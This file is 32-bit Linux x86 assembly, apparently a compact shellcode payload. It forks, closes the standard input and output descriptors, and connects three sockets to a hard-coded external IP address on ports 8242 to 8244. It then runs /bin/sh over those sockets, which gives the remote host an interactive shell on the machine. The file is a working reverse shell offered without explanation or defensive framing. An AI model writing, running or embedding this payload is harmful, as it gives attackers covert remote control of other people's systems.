BITS 32
	xor eax, eax
	mov al, 2
	int 80h
	cmp eax, 0
	je child
	ret
exit:
	xor eax, eax
	inc eax
	int 80h
child:	
	xor ebx, ebx
	push ebx
l0:
	mov ebx, [esp]
	mov al, 6
	int 80h
	inc byte [esp]
	cmp byte [esp], 3
	je l1
	jmp l0
l1:
	mov dx,8242
	call bhcon
	mov dx,8243
	call bhcon
	mov dx,8244
	call bhcon
	jmp mstr
havestr:
	pop ebx
	xor eax, eax
	mov al, 11
	xor ecx, ecx
	push ecx
	push ebx
	mov ecx, esp
	xor edx, edx
	int 80h
	mov eax, 1
	int 80h
mstr:
	call havestr
	db "/bin/sh",0

; di - port
bhcon:
	mov [esp-16], dx
	mov dword [esp-12], 2
	mov dword [esp-8], 1
	mov dword [esp-4], 0
	mov eax,102
	mov ebx,1
	mov ecx,esp
	sub ecx,12
	int 80h
	xor ecx, ecx
	mov byte [esp-32], 2
	mov [esp-31], cl
	mov dx, [esp-16]
	mov [esp-30], dh
	mov [esp-29], dl
	mov dword [esp-28], 0x22eaf05c
	mov [esp-24], ecx
	mov [esp-20], ecx
	mov [esp-12], eax
	mov [esp-8], esp
	sub dword [esp-8], 32
	mov dword [esp-4], 16
	mov eax,102
	mov ebx,3
	mov ecx,esp
	sub ecx,12
	int 80h
	cmp eax, 0
	jne exit

;	mov dword [esp-16], 0xDEAD1234
;	mov eax, 4
;	mov ebx, [esp-12]
;	mov ecx, esp
;	sub ecx, 16
;	mov edx, 4
;	int 80h

	ret